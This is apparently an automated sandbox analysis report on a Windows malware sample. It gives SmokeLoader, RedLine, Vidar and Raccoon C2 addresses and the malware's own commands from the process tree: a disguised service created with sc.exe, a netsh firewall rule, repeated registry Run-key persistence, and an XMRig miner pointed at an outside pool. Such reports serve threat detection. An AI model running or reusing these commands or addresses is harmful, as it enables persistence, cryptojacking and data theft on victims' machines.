Analysis

  • max time kernel
    37s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10-en
  • submitted
    06-09-2021 18:52

General

  • Target

    3feb7deca4f523c34c7be06105d58ac0936e7c8b668886ea058a6fa2b4fc9905.exe

  • Size

    221KB

  • MD5

    54e2fce74b3f39e6f7050d0b3b9b0636

  • SHA1

    c3c050cd2a43344b1d86a9ba0951d744aa5f460d

  • SHA256

    3feb7deca4f523c34c7be06105d58ac0936e7c8b668886ea058a6fa2b4fc9905

  • SHA512

    ce7276159630b7aca066786e754669c05b8fb04a094acb2d7ad78996c57f6f1551f5376d327fd709915ba60e248a09df5a2e10382c13dcaba08aa815bc128cdc

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://fazanaharahe1.xyz/

http://xandelissane2.xyz/

http://ustiassosale3.xyz/

http://cytheriata4.xyz/

http://ggiergionard5.xyz/

http://rrelleynaniy6.store/

http://danniemusoa7.store/

http://nastanizab8.store/

http://onyokandis9.store/

http://dmunaavank10.store/

http://gilmandros11.site/

http://cusanthana12.site/

http://willietjeana13.site/

http://ximusokall14.site/

http://blodinetisha15.site/

http://urydiahadyss16.club/

http://glasamaddama17.club/

http://marlingarly18.club/

http://alluvianna19.club/

http://xandirkaniel20.club/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

newnew

C2

185.167.97.37:30904

Extracted

Family

vidar

Version

40.4

Botnet

936

C2

https://romkaxarit.tumblr.com/

Attributes
  • profile_id

    936

Extracted

Family

raccoon

Botnet

fe582536ec580228180f270f7cb80a867860e010

Attributes
  • url4cnc

    https://telete.in/xylichanjk

rc4.plain
rc4.plain

Extracted

Family

vidar

Version

40.4

Botnet

1002

C2

https://romkaxarit.tumblr.com/

Attributes
  • profile_id

    1002

Extracted

Family

redline

Botnet

@Ebalosgory

C2

77.83.175.169:11490

Signatures

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 4 IoCs
  • XMRig Miner Payload 3 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 9 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 9 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 39 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 35 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3feb7deca4f523c34c7be06105d58ac0936e7c8b668886ea058a6fa2b4fc9905.exe
    "C:\Users\Admin\AppData\Local\Temp\3feb7deca4f523c34c7be06105d58ac0936e7c8b668886ea058a6fa2b4fc9905.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3968
    • C:\Users\Admin\AppData\Local\Temp\3feb7deca4f523c34c7be06105d58ac0936e7c8b668886ea058a6fa2b4fc9905.exe
      "C:\Users\Admin\AppData\Local\Temp\3feb7deca4f523c34c7be06105d58ac0936e7c8b668886ea058a6fa2b4fc9905.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:2680
  • C:\Users\Admin\AppData\Local\Temp\3473.exe
    C:\Users\Admin\AppData\Local\Temp\3473.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:588
    • C:\Users\Admin\AppData\Local\Temp\3473.exe
      C:\Users\Admin\AppData\Local\Temp\3473.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      PID:3788
  • C:\Users\Admin\AppData\Local\Temp\3A31.exe
    C:\Users\Admin\AppData\Local\Temp\3A31.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:3748
  • C:\Users\Admin\AppData\Local\Temp\41D3.exe
    C:\Users\Admin\AppData\Local\Temp\41D3.exe
    1⤵
    • Executes dropped EXE
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of AdjustPrivilegeToken
    PID:736
  • C:\Users\Admin\AppData\Local\Temp\48C9.exe
    C:\Users\Admin\AppData\Local\Temp\48C9.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:1776
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\yeeuxubv\
      2⤵
        PID:1684
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\lqmecfr.exe" C:\Windows\SysWOW64\yeeuxubv\
        2⤵
          PID:2152
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create yeeuxubv binPath= "C:\Windows\SysWOW64\yeeuxubv\lqmecfr.exe /d\"C:\Users\Admin\AppData\Local\Temp\48C9.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:2760
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description yeeuxubv "wifi internet conection"
            2⤵
              PID:3140
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start yeeuxubv
              2⤵
                PID:792
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:3944
              • C:\Users\Admin\AppData\Local\Temp\4E29.exe
                C:\Users\Admin\AppData\Local\Temp\4E29.exe
                1⤵
                • Executes dropped EXE
                PID:2876
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 768
                  2⤵
                  • Program crash
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3716
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 816
                  2⤵
                  • Program crash
                  PID:4192
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 800
                  2⤵
                  • Program crash
                  PID:4340
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 824
                  2⤵
                  • Program crash
                  PID:4396
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 956
                  2⤵
                  • Program crash
                  PID:4540
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 992
                  2⤵
                  • Program crash
                  PID:4644
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 1080
                  2⤵
                  • Program crash
                  PID:4732
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 1416
                  2⤵
                  • Program crash
                  PID:4888
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 1388
                  2⤵
                  • Program crash
                  PID:5064
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 1452
                  2⤵
                  • Program crash
                  PID:4148
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 1708
                  2⤵
                  • Program crash
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4192
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 1780
                  2⤵
                  • Program crash
                  PID:3944
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 1868
                  2⤵
                  • Program crash
                  PID:4452
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 1812
                  2⤵
                  • Program crash
                  PID:4624
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 1840
                  2⤵
                  • Program crash
                  PID:4748
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 1584
                  2⤵
                  • Program crash
                  PID:4356
              • C:\Users\Admin\AppData\Local\Temp\537A.exe
                C:\Users\Admin\AppData\Local\Temp\537A.exe
                1⤵
                • Executes dropped EXE
                PID:2708
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2708 -s 736
                  2⤵
                  • Program crash
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3152
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2708 -s 748
                  2⤵
                  • Program crash
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4132
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2708 -s 848
                  2⤵
                  • Program crash
                  PID:4364
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2708 -s 884
                  2⤵
                  • Program crash
                  PID:4428
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2708 -s 876
                  2⤵
                  • Program crash
                  PID:4524
              • C:\Windows\SysWOW64\yeeuxubv\lqmecfr.exe
                C:\Windows\SysWOW64\yeeuxubv\lqmecfr.exe /d"C:\Users\Admin\AppData\Local\Temp\48C9.exe"
                1⤵
                • Executes dropped EXE
                PID:4084
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                    PID:4160
                    • C:\Windows\SysWOW64\svchost.exe
                      svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                      3⤵
                        PID:5364
                  • C:\Users\Admin\AppData\Local\Temp\5A32.exe
                    C:\Users\Admin\AppData\Local\Temp\5A32.exe
                    1⤵
                    • Executes dropped EXE
                    PID:3676
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 756
                      2⤵
                      • Program crash
                      PID:4488
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 808
                      2⤵
                      • Program crash
                      PID:4600
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 816
                      2⤵
                      • Program crash
                      PID:4680
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 776
                      2⤵
                      • Program crash
                      PID:4780
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 952
                      2⤵
                      • Program crash
                      PID:4816
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 980
                      2⤵
                      • Program crash
                      PID:4928
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 1044
                      2⤵
                      • Program crash
                      PID:5008
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 1428
                      2⤵
                      • Program crash
                      PID:5096
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 1448
                      2⤵
                      • Program crash
                      PID:3936
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 1232
                      2⤵
                      • Program crash
                      PID:4216
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 1604
                      2⤵
                      • Program crash
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4340
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 1468
                      2⤵
                      • Program crash
                      PID:4400
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 1460
                      2⤵
                      • Program crash
                      PID:4644
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 1616
                      2⤵
                      • Program crash
                      PID:4728
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 1668
                      2⤵
                      • Program crash
                      PID:4900
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 1452
                      2⤵
                      • Program crash
                      PID:4892
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 892
                      2⤵
                      • Program crash
                      PID:5076
                  • C:\Users\Admin\AppData\Local\Temp\6946.exe
                    C:\Users\Admin\AppData\Local\Temp\6946.exe
                    1⤵
                      PID:4668
                    • C:\Users\Admin\AppData\Local\Temp\6ED5.exe
                      C:\Users\Admin\AppData\Local\Temp\6ED5.exe
                      1⤵
                        PID:4952
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          2⤵
                            PID:5436
                        • C:\Users\Admin\AppData\Local\Temp\7435.exe
                          C:\Users\Admin\AppData\Local\Temp\7435.exe
                          1⤵
                            PID:2760
                            • C:\Users\Admin\AppData\Local\Temp\7435.exe
                              "C:\Users\Admin\AppData\Local\Temp\7435.exe"
                              2⤵
                                PID:4360
                            • C:\Users\Admin\AppData\Local\Temp\854D.exe
                              C:\Users\Admin\AppData\Local\Temp\854D.exe
                              1⤵
                                PID:4828
                              • C:\Users\Admin\AppData\Local\Temp\88C8.exe
                                C:\Users\Admin\AppData\Local\Temp\88C8.exe
                                1⤵
                                  PID:4980
                                  • C:\Users\Admin\AppData\Local\Temp\lrWRoY.exe
                                    "C:\Users\Admin\AppData\Local\Temp\lrWRoY.exe"
                                    2⤵
                                      PID:2196
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                        3⤵
                                          PID:5572
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2196 -s 244
                                          3⤵
                                          • Program crash
                                          PID:5672
                                      • C:\Users\Admin\AppData\Local\Temp\Ajg9D2tcl.exe
                                        "C:\Users\Admin\AppData\Local\Temp\Ajg9D2tcl.exe"
                                        2⤵
                                          PID:4544
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                            3⤵
                                              PID:1784
                                              • C:\Windows\SysWOW64\reg.exe
                                                reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                4⤵
                                                  PID:4144
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                  4⤵
                                                    PID:4304
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                  3⤵
                                                    PID:4500
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                      4⤵
                                                        PID:5540
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          CMD /C CALL echo y
                                                          5⤵
                                                            PID:5560
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                          4⤵
                                                            PID:5576
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                          3⤵
                                                            PID:5988
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                              4⤵
                                                                PID:5232
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  CMD /C CALL echo y
                                                                  5⤵
                                                                    PID:2424
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                  4⤵
                                                                    PID:5028
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                  3⤵
                                                                    PID:6128
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                      4⤵
                                                                        PID:5592
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          CMD /C CALL echo y
                                                                          5⤵
                                                                            PID:3832
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                          4⤵
                                                                            PID:5068
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                          3⤵
                                                                            PID:4208
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                              4⤵
                                                                                PID:5440
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  CMD /C CALL echo y
                                                                                  5⤵
                                                                                    PID:6012
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                  4⤵
                                                                                    PID:484
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                  3⤵
                                                                                    PID:2436
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                      4⤵
                                                                                        PID:5880
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          CMD /C CALL echo y
                                                                                          5⤵
                                                                                            PID:5424
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                          4⤵
                                                                                            PID:6040
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                          3⤵
                                                                                            PID:6040
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                              4⤵
                                                                                                PID:5424
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  CMD /C CALL echo y
                                                                                                  5⤵
                                                                                                    PID:5372
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                  4⤵
                                                                                                    PID:2436
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                  3⤵
                                                                                                    PID:3168
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                      4⤵
                                                                                                        PID:4044
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          CMD /C CALL echo y
                                                                                                          5⤵
                                                                                                            PID:5796
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                          4⤵
                                                                                                            PID:4440
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                          3⤵
                                                                                                            PID:4424
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                              4⤵
                                                                                                                PID:6012
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                4⤵
                                                                                                                  PID:4012
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                3⤵
                                                                                                                  PID:6804
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                    4⤵
                                                                                                                      PID:6700
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        CMD /C CALL echo y
                                                                                                                        5⤵
                                                                                                                          PID:6488
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                        4⤵
                                                                                                                          PID:6940
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                        3⤵
                                                                                                                          PID:6892
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                            4⤵
                                                                                                                              PID:7332
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                CMD /C CALL echo y
                                                                                                                                5⤵
                                                                                                                                  PID:7524
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                4⤵
                                                                                                                                  PID:7392
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                3⤵
                                                                                                                                  PID:8044
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                    4⤵
                                                                                                                                      PID:7452
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        CMD /C CALL echo y
                                                                                                                                        5⤵
                                                                                                                                          PID:5196
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                        4⤵
                                                                                                                                          PID:7488
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                        3⤵
                                                                                                                                          PID:7604
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                            4⤵
                                                                                                                                              PID:7708
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                CMD /C CALL echo y
                                                                                                                                                5⤵
                                                                                                                                                  PID:7728
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                4⤵
                                                                                                                                                  PID:7764
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
